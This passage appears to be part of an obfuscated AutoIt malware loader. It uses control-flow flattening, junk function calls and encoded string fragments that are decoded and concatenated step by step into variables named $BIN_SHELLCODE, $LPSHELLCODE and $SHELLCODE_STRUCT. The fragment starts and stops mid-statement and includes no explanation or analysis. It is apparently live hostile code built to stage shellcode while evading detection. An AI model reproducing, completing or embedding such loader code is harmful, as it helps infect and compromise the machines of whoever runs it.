("qRL2U34wl07dgXvyiQMEduOJJ0rxM3v0D3MY063pBheqywNQx9NsMyE5bbs4KFTsEh" ) ENDIF IF $656182541 = 176683708 THEN LOCAL $BIN_SHELLCODE = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0..,..58..,58,6..1,2..,5..,3,61..,..2..,5..7,..4..,..5..3,..61..,61,..2..,..3..,54..,6..1,..53..,5..6..,6..2..,..5..3,..53,..60.." , ".." ) ) DIM $ILXXC5PYLMLLAMOCMFYR = 3157420 * 2564471 * 2581599 * 1575695 * 3055616 $656182541 = 1300820860 ENDIF IF $656182541 = 180257576 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6..,..60,..5..8,6..,6..1,6..,6..,..60..,5..8..,..4..,..61..,..6,..6,58..,5..8..,3,..3,..6..1..,58,3,..53,..5..3..,6..,..6..1" , ".." ) ) CHR (2032782 ) $656182541 = 1791187076 ISBINARY (392562 * 2059814 + 238926 + 4291304449 ) ENDIF IF $656182541 = 210168720 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..54..,53..,..5..7..,5..4..,62,..6..1..,..2,..5..7,..4,6..,53,6..1..,..2,..57..,5..5,53,57,..57,54..,61..,..56,5,61..,..53.." , ".." ) ) $656182541 = 1032281943 PTR (415365 + 4292446165 * 1664935 ) ENDIF IF $656182541 = 217336870 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("62,5..8..,58,5,3..,..59,..5..9..,..5..6..,6..2,54,54,..53..,6..,6..2,57..,3..,..5..3..,..5..6,..4,..5..7,..4,..58..,1..,53..,53.." , ".." ) ) DIM $WG7T0CJ8HPOZSTSWSNCE = 2708682 * 2769324 + 4293939872 $656182541 = 439011666 ISFLOAT (3481491 * 1150538 * 3853364 ) ENDIF IF $656182541 = 229030474 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56..,..5..,53,..54..,53..,..6..1,..5..6,..3..,..5..3..,..5..4..,53,..5..,2..,54,..5..8..,61..,..58..,3,..5..3,..6..0..,..62,..5..3,58,5..9..,1.." , ".." ) ) CHR (2387029 ) $656182541 = 2081176827 ISBOOL ("oUuFggefG10ACY0jb1qXezAwyHQLD34hAJXAOAJ2XqwAfGrjJAUirrKZt7gHzCKM6S93bzEKry9Ycaq2q" ) DIM $IW0J87HRTBCUOTEXGYIK = "j13rXWtQor3AHDk105drXrp6OitF3v2x1g9471klYafUI3gptFRDe2i2K7MNCYX2zFJBEp48U2DWlFwVbdlxNxs87gt9oFSanmtdtOVeKTTmywQe" ENDIF IF $656182541 = 238457315 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..3,..53..,5..3..,6..,..61,57..,..5..,61..,5..3,55,5..3,53,..5..3..,..53..,..6..1,..4..,57..,..5..8,..4..,6..1..,..5..8..,..5..3,..61,4.." , ".." ) ) ISBINARY ("yobmKDx65TnjCH9ltAvsgX5OgIKAoyw3sxZ8s0TlxiQ9Fc5ZR3qAqgFLtwfb37RFwu0fSb3CSk" ) $656182541 = 1461966853 DIM $5JDNVTVI5MM1NN5URSZA = 623493 MOD (3373745 , 405146 ) ENDIF IF $656182541 = 256356752 THEN #region xjFCr ISPTR (395861 + 4292989638 ) $656182541 = 176683708 ENDIF IF $656182541 = 269998012 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6..,5..8..,5..8..,2,..57..,5..6..,..5..6..,3,..5..3..,6..1..,..62,..60,4,..6,..5..3,59,59..,..5..6,2,..57..,5..9,..53,..59..,6..0" , ".." ) ) $656182541 = 800246788 ENDIF IF $656182541 = 287505096 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4..,56..,62,..2..,5..,..1..,5..7..,..5..3,5..3,..53,53,..5..3,..53..,..60..,57,..5..3,..62..,6,59..,..57..,5..9..,..54,..5..9,..53..,..5..4.." , ".." ) ) ISSTRING ("Sa2EG7s81XOdvvmGbtSqSStkmeWlCIMKtceSnQaGeolJBkabnlL3WfoaRRsCkhErkeTtqEsvtllCGTSbeV7r7TYnXeaGxHv7U3zxARUT2pJK3VD88qy" ) $656182541 = 2119340110 ENDIF IF $656182541 = 369187565 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,55,5..8..,6,..6..,..53..,..6,53..,..5..3..,5..3,53..,53..,..56..,53,55,..6..1,..62..,..57..,5..8,..5,3..,61..,2,..3..,..6..1" , ".." ) ) $656182541 = 1014469933 MOD (1959426 , 3057786 ) PTR ("MsuJxaoyRintbKcIgj6XGI8h5kGohrYVOc0OMQby5XMsclELBm1L3BleunOmD9rztBO9Uw5ziG1T5OeUO4W4zm1" ) ENDIF IF $656182541 = 411711931 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0..,4..,..2,..3..,6..1..,6..2,..57..,58..,4,..5..3,5..6,..62,..2..,..5,1..,53,..5..3..,..5..3..,5..3..,53,5..3,..5..3,6..0,..57..,5..4.." , ".." ) ) $656182541 = 287505096 CHR (90223 ) RANDOM (2037841 ) ENDIF IF $656182541 = 432319576 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..61..,4,..57..,..58,3..,..53..,6..1,..6..2,..6..1,..58..,..56,5..3,6..,6..,..6..,..6,..6,..6,..61,..4..,57..,5..8,..62..,..6..1.." , ".." ) ) $656182541 = 92596336 ISSTRING (341049 + 4293033473 ) ENDIF IF $656182541 = 438111387 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,53..,5,..2..,..54..,6..0..,..55,..5..8,..5..3,53,53,5..3,..53..,..53,..5..7..,53..,6..,..6..0,..4..,61..,5..4..,..2..,3..,53..,6..1" , ".." ) ) $656182541 = 229030474 WINEXISTS ("Imw9hJBi7cEytL4nSRDnjcRM8SELyMNrgqvTin0adx4cWcjVQnA8NQxGFUbyf0Tt" ) ENDIF IF $656182541 = 439011666 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..53,5..3..,6,..61..,57..,..53,5..,..53..,5..6..,..5..3..,..5..3..,..53..,..53,5..6,5..6,..3,53..,..5..6,62..,..54..,..5..9..,53,..6..,..62.." , ".." ) ) $656182541 = 1477365537 ENDIF IF $656182541 = 463618680 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3,..5..3..,..53,..6,..61..,5..7..,..5..3,..4..,6..,..5..,..6,..6..,..6..,6..,61,2..,57,5..8..,..5,5..3,5..,..2,..5..4..,4..,61.." , ".." ) ) DIM $HN16HU5KMQMZ3YMXMA4M = 2575191 + 4292344773 + 4291991878 + 1995746 + 4294436912 * 542630 + 2078330 $656182541 = 1577105263 PTR (318373 + 4291289985 + 4294495476 * 2306951 ) CHR (3915271 ) ENDIF IF $656182541 = 467902548 THEN LOCAL $SHELLCODE_STRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50,5..7..,..5..7,5..9,3..,5..9,..3,..58..,..5..6..,..60,5..7,..60..,..5..5..,..60,5..8,..5..9..,..56,60,..57,5..7,56..,..6..0..,55,5..9,58,..5..9,..54,..6..0,..5..7,..5..9,5..8..,55,61..,..5..5,..5..5..,..5..9..,..5..5,..6..0,62..,60..,57,..59,..58..,5..5,..5..3,59..,1,..59..,5..9..,5..9..,57..,59,..6..,..5..9,6..2,..59,..2,59..,..1..,5..9,..6..1,..5..9,..59,59,57..,59,..6..,..5..9..,6..2..,..60,..5..4,..5..9..,..1..,59..,..59..,5..9..,6..,5..9,..62,..5..9..,1,60..,54..,5..9,..57..,60..,5..6..,..5..9..,6..,..59..,62,5..9..,..59..,5..9..,..1..,59..,..5,59,57,..60,..5..6,6..0..,..54..,..59,6..,..5..9,..62,..5..9,59,5..9..,57..,59..,5..9,6..0..,..56,..6..0..,..54,..59..,6..0,60,5..6..,..58,..2,55..,5..5..,5..5,5..3..,..5..5,..5..9..,..55..,..5..3..,5..5,..5..7,..59,55..,5..9..,..6..2,59..,5..,5..7,3,..55..,..53..,..55,59,..55,53..,55..,..5..5,58,..4..,..55..,..5..5..,55,..3,..5..5,53..,..55..,5..7,5..9..,3..,6..0,..5..3..,..58..,..5..6..,..5..9,..6..1,..5..9,..58..,59,..3..,..59,..3..,..5..9..,..56,..5..9..,..6,..59,57..,..59..,5..8,5..5..,..62.." , ".." ) ) ) ) CHR (2288460 ) $656182541 = 1859058315 ISBOOL (1174237 + 4294009768 ) ENDIF IF $656182541 = 469934669 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,2..,..6..0..,57,..3..,..5..7,..1,..5..3,..6..1,6..1..,..5..4,5..,54..,6,6..,..53..,..6..,53,5..3..,..5..3,..5..3,5..3..,56,5..3,..1.." , ".." ) ) $656182541 = 210168720 ENDIF IF $656182541 = 496318929 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..6..,6,..6,..6,..6..,..6,61,6..2..,..53..,54,..6..1..,58,..3..,..53,..53..,6,..61..,57,..62..,..54,5..3..,5..6..,53..,..53.." , ".." ) ) $656182541 = 1223622893 DIM $C6927DFAOTKIC11K2YHD = 2117293 ENDIF IF $656182541 = 543265363 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4,5..6..,..61..,56..,2..,..6,1..,..5..7,53..,53,53..,..5..3..,5..3,53,..5..3..,5..3,60,5..9,..5..9,..2..,61..,..2..,..57..,5..5,..5..3.." , ".." ) ) DIM $81BMMJYAODEDSTEK5LKY = 3520351 $656182541 = 1921072536 WINEXISTS ("lAYHLV23fb2nE4J3yXYrI46I5pwnM" ) ENDIF IF $656182541 = 586524435 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6,6..,..6,6..,..6,5..,5..,5..6..,61,6..1..,56..,..53,3,3,..6..0,..61..,5..8,59,57,..6..,6..,6..,..6..,6" , ".." ) ) $656182541 = 1453481599 ISBOOL (2037682 + 1703481 + 4293323427 ) ENDIF IF $656182541 = 602321455 THEN #region WuJTXvRqoS $656182541 = 1079557876 CHR (1677329 ) ENDIF IF $656182541 = 605510513 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,5..4..,61,6..2..,..57,4..,6..,..53..,5..6,2,..3..,..61,6..0..,3..,4..,3..,6..1..,..2..,6..0,2..,56,..3,61..,2,..57.." , ".." ) ) ISBINARY (1090447 + 2514972 + 4293342371 ) $656182541 = 1368549586 DIM $HT5JQAC3UG1HEWGGIC5M = "TCQoweL2f2VkwKsCFMsyFzjVHWTSfn6UdAYppu46AboNf7ilneL0LXftt4QKv3W26bg6XcmlSw" DIM $OKNGEBKFHQUD5UOTJGOW = 2833401 + 3416383 + 1558029 + 3447519 + 4294464966 ENDIF IF $656182541 = 621304772 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..1..,5..3,..53,5..3..,..5..3,..5..3..,53,6..1..,..5..6..,..6..0,..4,..6..,57..,..53,..53,53,..6..,6..1..,..57,..61,53,..53,53,..5..3.." , ".." ) ) $656182541 = 696042996 PTR ("6YyVq040Ksg" ) STRING (1720008 * 3171788 ) ENDIF IF $656182541 = 696042996 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..53,5..3,..6..1,2,..62,..60..,..1,53,53..,5..3,5..3,5..3..,53,5..3,61..,56..,5..9,58,..6,..5..7..,..5..3..,53..,5..3..,..5..6.." , ".." ) ) CHR (600320 ) $656182541 = 543265363 ENDIF IF $656182541 = 706340665 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,6..,..6,6..0,..5..8,5..3,..3,6..,6,..60..,..58,..5..3,..6..1..,6,..6..,5..8..,58,1..,57,61..,5..8,3,5..3,5..3..,6" , ".." ) ) ISPTR ("fIwWiCf1jaKf" ) $656182541 = 1832168266 ISSTRING ("vcNvEOfKh1dz17aW7b9rXS5BT0dokooxbz9eBm1" ) ENDIF IF $656182541 = 730792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50..,5..7..,..57,..5..9,3..,59,3,57,..5..6..,..59,..54,59,..3,5..9,3..,..5..5..,..61,..5..5,..55..,59,2,..59,..58,..6..0,5..5,5..9,5..,..5..9..,5..8,5..9..,3..,5..6,..56,5..6..,55..,..5..5,5..5,..5..5,3..,5..5,5..3,..5..5,..5..5..,60..,5..3,60..,5..7,60,55..,55,..5..5..,55..,3,5..5,53..,..5..5,..55,5..8..,..59..,5..9..,62..,60,..55,60..,5..7..,..6..0..,..5..8,59..,..5..4..,..5..9,..3..,..57..,..5..4..,..5..9.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..59,3..,5..9,6,59,..56..,55,..5..5..,..5..5..,3,55..,..53..,..55..,..5..5..,..5..9..,..57..,60..,6..0,5..9,6..,6..0,..55..,..59,57,..5..5,..5..5..,..55,3..,5..5,53..,5..5..,5..5,56,..53,55..,..55..,55..,3,5..5..,53,..55,..55..,..5..9..,..5..7,..60,..6..0..,59..,6,..6..0,55,..59,..57..,..5..5..,5..5,55,3..,55" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..5,57..,5..9,5..5,5..9,..62..,..59,5..,57..,..3..,55..,3,55..,..5..3..,5..5,5..5,5..9,..5..7..,..6..0..,..60..,..5..9,6..,6..0..,55,..5..9..,..5..7..,55,..5..5..,..55,3,..5..5..,..5..3..,..55,..5..5,..5..6..,53..,..6..0..,6..1..,..5..6,5..6..,56,5..3,..5..6..,..53,56..,53,..5..5..,..55..,..5..5..,..3..,..55..,..53..,..5..5,..55..,5..9,5..7..,60..,..6..0,59..,6..,..6..0,..5..5,..59..,57..,55,55..,5..5..,..3..,..5..5..,5..3,..5..5..,..55..,..56..,..53..,..60..,..6..1..,56,..5..7..,..56,53,..5..5,55..,5..5..,62,..5..8,..2,5..5,..55,5..6..,..5..3..,..5..5..,..55..,58,4.." , ".." ) ) ) ) $656182541 = 467902548 RANDOM (400706 ) DIM $DM7RDGGMGLMOK0Z2LQXB = 3867971 ENDIF IF $656182541 = 737653776 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..6..1..,53..,..5..3..,61..,..2..,..57..,58,6..,..6..1,..53,6,..2..,60..,..53,..5..7,..6..0,53,..6..1,2,53,5..7,..61..,56..,53.." , ".." ) ) ISPTR ("o4U5vhh6l7rH342w7pJmGnBfwAmqji2mGL2L3l0EHOOBKeWCJK7ej8ubCNH540WcfebqcqCWzfO2H9EsNTRHkXdIq0jpM4JR2LwGdEAt" ) $656182541 = 38669117 INT (1865668 ) ENDIF IF $656182541 = 762027222 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..62..,..5..7,58,..6..,61,..61,..5..8..,..3..,5..3,6..0..,..58,..56,2,6..1,5..8,..6..,6..,..53..,..6,61..,..57,..55,56..,53" , ".." ) ) $656182541 = 1479637702 ENDIF IF $656182541 = 762656979 THEN LOCAL $BINL = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0,5..7..,..55,59..,..62,5..9..,..5..,59,54..,..6..0,55..,..6..0,6..2..,5..7,..3..,..5..9..,58..,59,5,..55,..61,5..5..,5..7..,57..,..5..5..,5..9..,..6..2,5..9..,..5,..58..,..6,..5..8,..5..6,59..,6..1,5..9,..58..,5..9,..3..,..5..9..,3..,59,56..,..5..9..,..6,59..,57..,5..9,5..8,..5..5..,..62" , ".." ) ) ) ) $656182541 = 730792303 DIM $CAMGNJEF896M8PJSWZ9I = "pYwRgxNyGNTeEJEnm5bjHuCGZk9h2XY3jcnlZzgV1gBvnICONekD79z4u016xFFU0Z5CwsyWZqrB3hspRuCXLt6jLs19IkwvKRFxNarvQyOQS8anHLodc" ISSTRING (3085209 + 1784653 + 4294103362 + 4291384977 ) ENDIF IF $656182541 = 781366022 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..5..9,6..1,2..,57..,6..0,5..6,..3..,61,2..,57..,5..7..,5..6..,..61,..60,..61,..53,..5..6,..3,..60,..6..1,2..,5..8..,..5..3..,5..5" , ".." ) ) DIM $4LRCHHNOPAMSNB75SS1J = 3948 + 4291464061 + 935259 * 1062352 + 62929 * 3135618 $656182541 = 864731176 RANDOM (2145152 ) ENDIF IF $656182541 = 784317271 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,5,..5..7..,..3..,6..0,..2..,..6..2,..53..,..5..7,3..,6..0,6..1,58..,6..0..,3..,6,6..,..6,6,..6..,6,5..,57..,61..,60" , ".." ) ) $656182541 = 158308218 PTR (1349936 * 3223997 ) ISFLOAT (2509884 + 4292517608 + 4292032918 + 4291755693 ) ENDIF IF $656182541 = 798922638 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..2,5..3,60,..5..3..,56,5..7,5..8,..54..,5..3,5..8..,5..3,61,..2,..57..,6..0..,..6,..6..1,5..3,..5..6,..3,..56..,58,..53,..6" , ".." ) ) $656182541 = 143550684 ENDIF IF $656182541 = 800246788 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..6,5..5..,3..,61..,2,..60,4,4,5..3,..61..,56..,..3..,60..,..5..5..,..3..,53,..5..6,6,5..,6,6,6..0,6..0,..6..,3.." , ".." ) ) $656182541 = 798922638 INT (1515389 ) ENDIF IF $656182541 = 823793270 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..59,..57,54..,6..1..,62,..5..7,4,..6..,..5..7..,..5..6..,2..,3..,..6..1,..60..,..55,..6..2,5..,56,..5..6,..6..,6,..59,..61,..53" , ".." ) ) $656182541 = 1508795126 ISSTRING ("5smjjm9nq8nSU2mjQTqVjttspT6CGlNugHg" ) ENDIF IF $656182541 = 836440117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,53..,..5..4..,5..3..,..5..3..,53..,..5..3..,5..6,5..6..,6,..6,6..,..6,..60,..5..9,58,57..,6..,6..,..60,..5..8,5..4,..5..3..,58..,5..6.." , ".." ) ) $656182541 = 269998012 ENDIF IF $656182541 = 848901156 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,..3..,53,6..0..,57..,5..4..,..6..2,6..1..,2..,53..,..5..7..,2..,..55..,5..3,56,..3..,..60..,58..,..53..,5..,..6..1,61,5..5,6,6" , ".." ) ) CHR (257452 ) $656182541 = 1718368979 ISPTR (2860008 + 789318 + 573977 + 4291086776 ) CHR (1034243 ) ENDIF IF $656182541 = 856025391 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..53,..5..3,..5..3..,5..3,53,..5..8,..6..0..,..5..8..,..5..6,..6,..6,58,..58,..3,5..7,..61,..2,..5..8..,4..,..6..,..3..,..5,..62,6" , ".." ) ) DIM $U3KLV13LX9SHM4OJNJFY = 1378063 $656182541 = 836440117 ISSTRING ("J5bF4LeketafYOXmLJ8dOtmga1T2VYWqDHLC8mNaZd" ) ENDIF IF $656182541 = 860380632 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,35..,4..0..,27,44..,..51,..2..0,41..,19..,4..6,..4..4,..35..,4..0,..33" , ".." ) ) ) DIM $AQO5KZFTQPS5EC3MZPGU = 2453505 + 192974 + 4294077630 + 4291182303 $656182541 = 762656979 ISBINARY (1251333 + 4291503526 + 863704 * 2574263 ) DIM $VUDRKHMNPWYYTNTSV2HF = 296936 + 4293382210 * 3643448 + 3415560 * 2324144 + 4292672430 + 1814128 + 4292169687 ENDIF IF $656182541 = 864731176 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,6..1,..2,58..,6..1,5..4,3..,53..,..56,4..,..60..,..6..1..,2..,57,..61,..5..5,..5..7..,..5..3,56..,..4..,6,61..,2..,..57..,53" , ".." ) ) ISFLOAT ("L7H6IWiy3h2eleW4vfWzqMeNXxvt6THcGRDh3ByhcBfCTEYxMXoe55K824jkAYBjJ0HEKOa4QOwYHL5sI8RiECgKgEo8soRn96236t" ) $656182541 = 1808850186 ISPTR ("qHWAq90KBhtNgT6yfAcKB7jYLTbvplUwke0dte79BMpgQrW" ) ENDIF IF $656182541 = 868457996 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..3,5..9..,..1,5..3,..53..,59,1..,..5..3,5..7..,..61..,..4..,5..7,58,..2..,3..,..58,..5..3,6..1..,2,61,5..8,2,57..,..6.." , ".." ) ) ISSTRING (2912355 + 1611821 * 3286816 + 4291133380 ) $656182541 = 2057237529 ENDIF IF $656182541 = 871530397 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,53..,5..3..,..6..1,4,61,..5..8..,..5..4,53,..6..,3,..6,6,..6..,..6,58..,..53,..6..,6..,58..,..58,..5..,6..1..,6..1..,..2.." , ".." ) ) DIM $23EADCIYSCHT72VTENLB = "GNupzb7q9UTXTq" $656182541 = 983205074 ISFLOAT (524470 + 4291556725 + 4292596246 ) ENDIF IF $656182541 = 896046375 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,59..,60..,5..6..,59,3,..6..1..,..2,..6..0,..4..,..4,..5..3,6..1..,..5..6,3..,..6..0,56,..3..,..53..,..5..6,6..,..5,..61,..2,53" , ".." ) ) $656182541 = 1428652054 ENDIF IF $656182541 = 937837217 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,6..,..6..1..,..57..,..57..,58,5..3..,5..5,5..3,..5..3..,53,..5..3,5..9,1..,5..7,5..3..,..59,61,53..,..53,56,..5..3,5..3..,..53,5..3.." , ".." ) ) $656182541 = 2069227035 DIM $BLHSRYGOKOCZL4195RDV = 3271304 ENDIF IF $656182541 = 954977294 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58..,..5..7,5..7..,6..,6..,6,..6,6,6,6..1..,4..,..5..7,..5..8..,62..,..57,..6..1..,6..2,61..,58,..57,6..1,6,..6,6,6" , ".." ) ) MOD (939398 , 2378577 ) $656182541 = 61093985 PTR ("8QyJ2eB8wD3I67Ak6z7p9pewtDRaUAQww3mnCycmbXBB5OsM7L0E405TLcqyxBn5YFlcUmRHxVomXLANldciJkCF8DLziNZIJGMyCq2V4shiLT" ) ENDIF IF $656182541 = 983205074 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..4,5..4,5..3,3,6..0,6..1..,5..8,54..,..53..,..6..,..3,6,..6..,6..,6,53..,..60..,53..,..5..3..,..53..,..5..4..,5..3,..5..3..,..6..1.." , ".." ) ) ISBINARY (853234 + 4294669970 ) $656182541 = 1364348677 ENDIF IF $656182541 = 1014469933 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..2,..5..7,..5..9,..5..6..,..57,..55,6..2,5..3,..57,..54..,..6..2..,6..1,..2..,..57..,..4,6,5..3..,..61,2,5..7,60,..5..6..,..57..,..53" , ".." ) ) $656182541 = 469934669 CHR (2930591 ) ISBINARY ("ck5lqoqdt4pHMYFAFjEl9vXlLkL4xn6fOaIArhi0dJTVZS7C2szFhe9RxTIfLwOg7j2LpfixaOhyMcw3nibfXA8Kb2dIHcnQ4LXOZunXjbEC6JeuvQ2DvJ" ) ENDIF IF $656182541 = 1027989821 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..60..,..3,5..4..,5,..59..,..5..3,..57,53..,..5..6,6,..5..3..,..6..1..,..2..,..3,..59..,..5..5,58..,..53..,53..,..5..3..,5..3..,..53..,..5..3..,..6" , ".." ) ) $656182541 = 1138660241 DIM $JZ7BBEAOSE34N5V5FNAY = "n2kTuusqEHT0WJmHaEfdgNL9IhNHKOMkIsw6WSgjR7mFjeBvIxEjuULIqlkmQVQZ4IqCnpVrx5vjAfZEQs8mkC" ENDIF IF $656182541 = 1032281943 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..6..1..,..6..2..,..5..7..,..4..,6..,..5..3,4,..5..4,..5..,..6..1,..5..6,2..,3,61,..6..0..,..5..5,..2..,..2..,..6..1..,2..,57,4..,..6..,..57" , ".." ) ) ISFLOAT (2686755 + 4291363587 + 4291191705 ) $656182541 = 1469834065 ISPTR (543575 + 4294142473 ) ENDIF IF $656182541 = 1038131997 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..6,..56..,..6,6..,..3,60,57..,..58..,..5..,3,5..3..,..54,53,53,5..3,..5..3..,53,53,..5..8,..6..0..,6..,..6..,6..0..,..5..8,4" , ".." ) ) STRING ("lwQGxWDOBTBVzJkU" ) $656182541 = 1295546840 ENDIF IF $656182541 = 1048715572 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,3..,6..1,..6..1..,..5..6,..6,..5,53..,5..5,6,6..,..2,..57..,..2,5..8,..5..8..,61,..6..,..6,..6,..6..,..6..,..6..,..53,..6.." , ".." ) ) $656182541 = 1700940958 ISFLOAT (3843284 + 4293224952 + 2601517 + 4294039111 ) ENDIF IF $656182541 = 1051260188 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,..5..3,6..1,60..,..55,..5..,..60..,56,..5..6,..3..,53..,58,6..,58,..5,5..8..,..2..,..6..1,2,5..,5..8,5..8..,4,3..,55.." , ".." ) ) DIM $JXTJ1UNSTCBQ78JFRH80 = 853762 $656182541 = 737653776 INT (57263 ) ENDIF IF $656182541 = 1053930317 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..6..1..,..6..2,..61..,..5..8..,58,5..3..,..6..,..6,6..,6,6..,6..,..6..1..,4,5..7..,5..8,3..,3,..3..,..60..,..6..1..,5..8..,59,..5..3.." , ".." ) ) DIM $52HVPETTXWBB6HEABBNH = 3122445 $656182541 = 586524435 DIM $3BZGTR5MGIJLTEWWULXV = "Wls2I2ntZ9KBmkr40cVFs" ENDIF IF $656182541 = 1061461686 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..62..,5..8..,..3,5..3..,57,53,61,..4..,..5..7,..4,62..,3..,..5..8..,..54..,5..8,..5..3..,6..,6..,..6..0..,60..,5,57..,61,2" , ".." ) ) INT (3321565 ) $656182541 = 602321455 ISPTR ("rhi2h0gOVZStRJHjGuEC4JMo1lpccZTB4CSDttdBXl" ) ENDIF IF $656182541 = 1070530058 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..3..,..53,..5..3..,5..3..,..53..,..53..,..61..,..2..,60,5..9..,..53..,..3,..61,2,60..,..59,..53,3,6..1,..2,5..6..,..5..9..,..61,2" , ".." ) ) WINEXISTS ("SOlYr6BRD3a5JeL6gqyo2e0nqdOTtSA1t4twN4k8ba" ) $656182541 = 39019882 INT (545323 ) ISBOOL ("HKNCNZ8HnqTxWCiLOVormgzm2fy4il6j933qOBOHOv6SsLn7jGm7tcLAkBKIzezctIy2J26nfRM0jS3p1BUK89Z7rBfn0ghK6" ) ENDIF IF $656182541 = 1079557876 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..6..0..,..5..,..6..1..,53..,56,57..,..58,..6,61..,..5..8..,5..3..,..6..,..6,60..,5..8,4..,6..1,..6..,6..,5..8..,5..8..,..3..,3..,..6..1" , ".." ) ) ISPTR ("xrJ91MyWrCHvR8tYetTAJiWTx9Ic3qtkbFdCb9hmH" ) $656182541 = 1396856746 ISBINARY (1977577 + 1084610 + 3281510 ) ENDIF IF $656182541 = 1082073854 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6,60..,59,57,..5..8..,5..3..,..6..,2,..6..0..,..57,..57,..57,..1..,53,..6..1,59,59,..61,..58..,..3,53,..6..0..,..57..,5..5" , ".." ) ) MOD (2012800 , 3375319 ) $656182541 = 369187565 DIM $W2AIXTK51WEMG3E8IE2J = 1651781 CHR (1030540 ) ENDIF IF $656182541 = 1131844544 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,6..,61..,..5..8..,5..9,..54,..53..,..55..,5..3,5..3..,5..3,5..3..,..59,1,..5..7..,..53,..5..9..,6..1..,5..3,..5..3..,..56,5..3,..5..3,..53..,5..3" , ".." ) ) $656182541 = 1745262236 RANDOM (734950 ) ENDIF IF $656182541 = 